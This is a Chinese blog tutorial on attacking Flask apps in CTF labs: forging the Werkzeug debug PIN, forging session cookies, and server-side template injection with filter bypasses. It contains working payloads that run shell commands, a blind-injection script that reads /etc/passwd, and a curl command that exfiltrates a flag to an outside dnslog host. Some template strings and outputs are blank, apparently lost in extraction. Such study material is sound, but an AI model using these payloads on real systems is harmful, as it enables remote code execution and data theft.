浅谈flask与ctf那些事

作者: 蚁景科技 | 来源:发表于2020-08-21 16:43 被阅读0次

最近跑了培训写了点flask的session伪造，没能用上，刚好整理了一下先前的资料把flask三种考过的点拿出来写写文章。

debug pin

本地先起一个开启debug模式的服务：

# -*- coding: utf-8 -*-

from flask import Flask

app = Flask(__name__)

@app.route("/")

def hello():

return 'hello world!'

if __name__ == "__main__":

app.run(host="0.0.0.0", port=8080, debug=True)

本机启动时会打印出如下：

Use a production WSGI server instead.

* Debug mode: on

* Restarting with windowsapi reloader

* Debugger is active!

* Debugger PIN: 284-467-555

* Running on http://0.0.0.0:8080/ (Press CTRL+C to quit)

多次启动会发现打印的PIN码是相同的，分析源自参考链接，可以得出debug pin由六个值决定：

用户

flask.app

Flask

flask目录下的一个app.py的绝对路径

当前电脑的MAC地址，为mac地址的十进制表达式

首先尝试读取/etc/machine-id或者 /proc/sys/kernel/random/boot_i中的值，若有就直接返回；假如是在win平台下读取不到上面两个文件，就去获取注册表中SOFTWARE\\Microsoft\\Cryptography的值，并返回

也就是我们如果能够伪造这六个值我们就能够生成一个一模一样的PIN码了。

靶机测试

而要获取这六个值我们可以通过任意文件读取来获得，因此本地写一个文件读取的漏洞点，并且为了方便写一个报错页面，放docker上启动：

# -*- coding: utf-8 -*-

from flask import Flask, request

app = Flask(__name__)

@app.route("/")

def hello():

return Hello['a']

@app.route("/file")

def file():

filename = request.args.get('filename')

try:

with open(filename, 'r') as f:

return f.read()

except:

return 'error'

if __name__ == "__main__":

app.run(host="0.0.0.0", port=8080, debug=True)

flask.app

Flask

获取machine-id

直接访问即可：

http://172.19.75.19:30000/file?filename=/etc/machine-id

32e48d371198e8420c53b0a1fa37e94d

获取mac地址

http://172.19.75.19:30000/file?filename=/sys/class/net/eth0/address

02:42:ac:11:00:02

print(0x0242ac110002)

2485377892354

用户名从报错界面可以获得

使用脚本即可获得pin码：

import hashlib

from itertools import chain

probably_public_bits = [

'root',# username

'flask.app',# modname

'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))

'/usr/local/lib/python3.5/site-packages/flask/app.py' # getattr(mod, '__file__', None),

]

private_bits = [

'2485377892354',# str(uuid.getnode()), /sys/class/net/ens33/address

'32e48d371198e8420c53b0a1fa37e94d'# get_machine_id(), /etc/machine-id

]

h = hashlib.md5()

for bit in chain(probably_public_bits, private_bits):

if not bit:

continue

if isinstance(bit, str):

bit = bit.encode('utf-8')

h.update(bit)

h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None

if num is None:

h.update(b'pinsalt')

num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None

if rv is None:

for group_size in 5, 4, 3:

if len(num) % group_size == 0:

rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')

for x in range(0, len(num), group_size))

break

else:

rv = num

print(rv)

得到：

284-995-758

在debug页面输入后成功执行代码。

session伪造

p神文中提到一个客户端session，flask中的session是存放在cookie中的，那么cookie中的字段在客户端访问时是可以被修改的，这就是客户端session，像php的session是存放在服务器中的，django的session可以存放在数据库中，也可以以文件形式存放在服务器中。

而flask的客户端session需要解决的就是防篡改问题，p神总结出来为以下四点：

json.dumps 将对象转换成json字符串，作为数据

如果数据压缩后长度更短，则用zlib库进行压缩

将数据用base64编码

通过hmac算法计算数据的签名，将签名附在数据后，用“.”分割

因此，防篡改的功能位于第四步，也就是签名，在前面学过jwt感觉是差不多的，签名不对的话服务端是无法通过验证的。

写一个flask应用后给session赋值（非正式写法）：

from flask import session

session['user'] = 'tom'

可以看到cookie中是有这么一段东西：

session=eyJ1c2VyIjoidG9tIn0.XzVf_w.Is2SqC_MS8NIBynok5BQpmldBLI

解密后我们看到:

前半截是一个json串，后半截就是一个签名了，倘若有一个ssti，我们通过如{{config}}读取到密钥，那么就可以通过flask-session脚本来伪造session，替换上cookie之后即可达成session伪造。

靶机测试

通过ssti获取到密钥：

http://127.0.0.1:8080/?a={{config}}

抓包获取session，解密取得格式。

{"user":"tom"}

工具伪造session：

$ python3 flask_session_cookie_manager3.py encode -s 'hello world' -t '{"user":"admin"}'

eyJ1c2VyIjoiYWRtaW4ifQ.Xzqkag.jq8cULYNeQYVZiH-2Fe3cAfECk4

替换后：

ssti

老生常谈的问题，一直没总结，稍微写写。

先前对于ssti的理解不是很清晰，只会解一些稍简单的ssti，前段时间想出个flask的ssti才发现原来并不是模板中的变量可控就会导致模板注入，一个典型的模板注入如下：

from flask import Flask, render_template_string, request

app = Flask(__name__)

@app.route('/', methods=['GET', 'POST'])

@app.route('/index', methods=['GET', 'POST'])

def index():

template = '''

<div>

</div>

''' % (request.url)

return render_template_string(template)

此种形式存在着变量可控的，同时使用了一个不固定的模板，此时就造成了一个ssti，应该认识到的是实际场景很少有ssti的漏洞，因为像这样写模板如果代码量少的话确实方便，但代码量多的话都会写成下面的形式了：

def index():

return render_template("index.html",title='Home',user=request.args.get("user"))

<html>

<head>

<title>{{title}}</title>

</head>

<body>

<h1>Hello, {{user.name}}!</h1>

</body>

</html>

这种情况下是模板先渲染后我们再传入变量，此时代码是安全的；那么目前主题是ssti，当然要继续以不安全的代码来测试一下ssti :），为方便测试我们对第一套代码再作修改：

from flask import Flask, render_template_string, request

app = Flask(__name__)

app.secret_key = "hello world"

@app.route('/', methods=['GET', 'POST'])

@app.route('/index', methods=['GET', 'POST'])

def test():

template = '''

<div>

</div>

''' % (request.args.get("a"))

return render_template_string(template)

if __name__ == '__main__':

app.debug = True

app.run()

运行，传入路由：

http://127.0.0.1:5000/?a={{7*7}}

发现输出49，此时就说明了能够被利用来进行ssti的测试；那么前面学习session伪造时所需要的密钥就可以通过config读到：

http://127.0.0.1:5000/?a={{config}}

那么此处无论是采用%s、format或是其他形式的格式化字符串都好，只要我们的模板在被渲染之前就存在着某处可控，那么就存在着ssti的风险。

无过滤

以前稍微学过，再做个复习。

默认的，所有类追溯回去都能是有着一个object类，因为两个py版本下会有差别，所以分两个py版本进行测试。

py3.7

第一步先通过一个对象获取到对应的类。

#-*- coding:utf-8 -*-

#__author__: HhhM

class MyownClass():

def __init__(self):

self.name = "a"

print(MyownClass().__class__)

print("".__class__)

print([].__class__)

"""

out:

"""

可以看出来__class__是返回该对象所对应的类，下一步拿到基类，也就是object:

print(MyownClass().__class__.__base__)

print("".__class__.__base__)

print([].__class__.__base__)

"""

out:

"""

那么这里也能得到__base__的作用，获得其是获得类所继承的类，可以看到构造出来是一样的类（object），那么我们写一个继承类看看__base__输出什么：

#-*- coding:utf-8 -*-

#__author__: HhhM

class MyownClass():

def __init__(self):

self.name = "a"

class MyownClass1(MyownClass):

def __init__(self):

self.name = "a"

print(MyownClass1().__class__.__base__)

print(MyownClass1().__class__.__base__.__base__)

"""

out:

"""

所以我们拿到一个继承类时可以通过base来层层回溯获取到object类，获取到object类后继续：

print("".__class__.__base__.__subclasses__())

print("".__class__.__bases__[0].__subclasses__())

"""

out:

[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplementedType'>,....]

"""

__subclasses__获取的是当前类的子类列表，那么我们对应上面有继承关系的MyownClass这个类获取到的则是：

[<class '__main__.MyownClass1'>]

通过object类获取到的是一个列表，因此可以通过列表取值的方式获取到我们需要的类，然而会发现类太多了，找到了我们要的类也不知道他处于列表的哪个位置，可以简单写个脚本跑一下：

#-*- coding:utf-8 -*-

#__author__: HhhM

import json

a = """

"""

num = 0

allList = []

result = ""

for i in a:

if i == ">":

result += i

allList.append(result)

result = ""

elif i == "\n" or i == ",":

continue

else:

result += i

for k,v in enumerate(allList):

if "os" in v:

print(str(k)+"--->"+v)

我在128取到了<class 'os._wrap_close'>，我们通过调用它的__init__方法进行初始化类：

print("".__class__.__base__.__subclasses__()[128].__init__)

"""

"""

通过调用globals可以获取到类内存在的方法、属性等值：

print("".__class__.__base__.__subclasses__()[128].__init__.__globals__)

会发现是一个字典，因此我们只需要找到其内存在我们需要的值对应的键之后取值即可。

python3中没有file对象，但还有open，因此有：

print("".__class__.__base__.__subclasses__()[128].__init__.__globals__["open"])

"""

<built-in function open>

"""

此时取到的open我在本地测试时会报错，网上提示是被os的open模块覆盖了，测试后可以如下取到：

print("".__class__.__base__.__subclasses__()[128].__init__.__globals__['__builtins__']["open"]("2.py").read())

可以看出来各个环境下具体情况也会有区别，本地测试通远程不通大多是这个原因了吧，倒是个需要记住的点。

还有个popen可以执行命令：

print("".__class__.__base__.__subclasses__()[128].__init__.__globals__['popen']("dir").read())

本地测试的话可以写个脚本跑跑有什么可以用的，像找能够构造出eval的类：

for i in "".__class__.__base__.__subclasses__():

try:

i.__init__.__globals__['__builtins__']["eval"]("__import__('os').popen('dir').read()")

print(i)

except Exception:

pass

会发现的是只要拥有__builtins__的就可以构造出来。

os模块也能如此利用：

"".__class__.__base__.__subclasses__()[128].__init__.__globals__['os'].popen('whoami').read()

py2.7

py3了解之后再回看py2会明了的多，首先是字符串取基类，我发现就是以py3的payload取：

print("".__class__.__base__)

print(().__class__.__base__)

"""

out:

"""

str类需要再套一层base才能取到object类，而其他内置类不需要。

然后找链的过程就大同小异了，py2区别py3的说就有一个file类，可以直接用来读写文件了，用上面的脚本跑出file对象对应的位置。

# 读

print(().__class__.__base__.__subclasses__()[40]('2.py').readline())

print(().__class__.__base__.__subclasses__()[40]('2.py').readlines())

# 写

print(().__class__.__base__.__subclasses__()[40]('2.py').write('context'))

bypass

下面环境皆以py3.7作为测试环境，起个docker，发现os._wrap_close处在第35的位置。

过滤base

过滤base之后还可以用mro：

class MyownClass():

def __init__(self):

self.name = "a"

class MyownClass1(MyownClass):

def __init__(self):

self.name = "a"

print("".__class__.__mro__)

print(().__class__.__mro__)

print(MyownClass1().__class__.__mro__)

"""

out:

(<class 'str'>, <class 'object'>)

(<class 'tuple'>, <class 'object'>)

(<class '__main__.MyownClass1'>, <class '__main__.MyownClass'>, <class 'object'>)

"""

包含了整条的继承链，可以看到的是object一直处于最末，直接取-1即可：

print(().__class__.__mro__[-1])

取到object类后接下来的操作就一毛一样了。

也可以用拼接：

print(().__class__['__ba'+'se__'])

过滤class

拼接：

这四个都是flask的内置对象，通过他们我们就可以获取到object类了，拼接绕过的话是可以绕过大部分过滤的了。

如果这里mro被过滤了则可以尝试用base一层一层溯源到object类

过滤中括号

利用__getitem__可以取第n位，如：

http://127.0.0.1:5000/?a={{().__class__.__mro__.__getitem__(-1)}}

也可以用pop弹出列表第n位：

过滤双大括号

可以考虑使用判断语句：

http://127.0.0.1:5000/?a={% if "".__class__.__base__.__subclasses__()[128].__init__.__globals__['popen']("curl `cat /flag`.z2yw9j.dnslog.cn").read()=='test' %}1{% endif %}

无回显可用curl外带。

过滤subclasses

依旧拼接大法：

感觉吧，只要没过滤加号就能拼接绕过。

过滤关键字符

前面的话是构造获取需要的方法链时的一个绕过，这里的话就是在命令执行时的绕过，主要是chr函数起的作用，像php或者是nodejs也有类似的玩法，chr()字符拼接达成绕过。

主要是从含有builtins的类中获取到chr函数，如下：

"".__class__.__base__.__subclasses__()[35].__init__.__globals__['__builtins__']['chr']

模板语言还是不弱的，我们可以用来设置值简化payload长度同时进行绕过：

{% set c = "".__class__.__base__.__subclasses__()[35].__init__.__globals__.__builtins__['chr'] %}{{"".__class__.__base__.__subclasses__()[35].__init__.__globals__['popen'](c(119)%2bc(104)%2bc(111)%2bc(97)%2bc(109)%2bc(105)).read()}}

过滤引号

过滤引号的话同样可以用chr来绕过传参时所需要的引号，只需要将先前的链中取值方式略作修改即可，取chr

{{().__class__.__base__.__subclasses__()[35].__init__.__globals__.__builtins__.chr}}

则执行命令为：

{% set c = ().__class__.__base__.__subclasses__()[35].__init__.__globals__.__builtins__.chr %}{{().__class__.__base__.__subclasses__()[35].__init__.__globals__.popen(c(119)%2bc(104)%2bc(111)%2bc(97)%2bc(109)%2bc(105)).read()}}

因为flask中存在着request这个内置对象，所以我们也可以利用request来绕过。

在使用模板时，当存在{{request.args.test}}，在我们传入?test=asd时即可指定其值为asd，并且默认的为字符串类型，我们可以借此来达成绕过引号。

如：

?a={{().__class__.__base__.__subclasses__()[35].__init__.__globals__.popen(request.args.cmd).read()}}&cmd=ls

事实上如果request对象没被过滤的话，我们可以用此种方式绕过绝大部分过滤。

盲注

这个方法是从p0师傅的博客中看到的，就是利用if语句返回值来判断语句是否为真，然后从输出值来判断结果。

py2的话可以用file对象，py3则可以用open。

#-*- coding:utf-8 -*-

#__author__: HhhM

import requests

url = 'http://172.23.129.221:12339/?a='

def check(payload):

r = requests.get(url+payload).content

return 'hhhm' in r

password = ''

s = """

0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!$'()*+,-./:;<=>?@[\]^`{|}~"_%

"""

for i in range(0,100):

for c in s:

payload = '{% if ().__class__.__base__.__subclasses__()[35].__init__.__globals__.__builtins__.open("/etc/passwd").read()['+str(i)+':'+str(i+1)+'] == "'+c+'" %}hhhm{% endif %}'

if check(payload):

password += c

break

print password

过滤init

还有一个替代的__enter__，同样的有paylod：

{{().__class__.__base__.__subclasses__()[35].__enter__.__globals__.__builtins__.open("/etc/passwd").read()}}

甚至还有另一个__exit__同样可以替代：

{{().__class__.__base__.__subclasses__()[35].__exit__.__globals__.__builtins__.open("/etc/passwd").read()}}

base64绕过

简单易懂，py2下可以不过py3因为其字符为unicode编码，需要进行转码。

{{().__class__.__base__.__subclasses__()[35].__exit__.__globals__.__builtins__.open("X19pbXBvcnRfXygnb3MnKS5wb3BlbignbHMnKS5yZWFkKCk=".decode('base64')).read()}}

环境

配套docker已发布于github：https://github.com/a756379684/flask-sec-docker

参考

参考自：

https://xz.aliyun.com/t/2553

https://www.leavesongs.com/PENETRATION/client-session-security.html

https://xz.aliyun.com/t/7746

https://p0sec.net/index.php/archives/120/

相关实验--Flask服务端模板注入漏洞

（通过该实验了解服务端模板注入漏洞的危害与利用。）

网友评论

本文标题：浅谈flask与ctf那些事

本文链接：https://www.haomeiwen.com/subject/petpjktx.html

延伸阅读

深度阅读

您也可以注册成为美文阅读网的作者，发表您的原创作品、分享您的心情！

浅谈flask与ctf那些事

相关文章

网友评论

延伸阅读

深度阅读

栏目导航

热点阅读

Ethical Hackers

网络安全实验室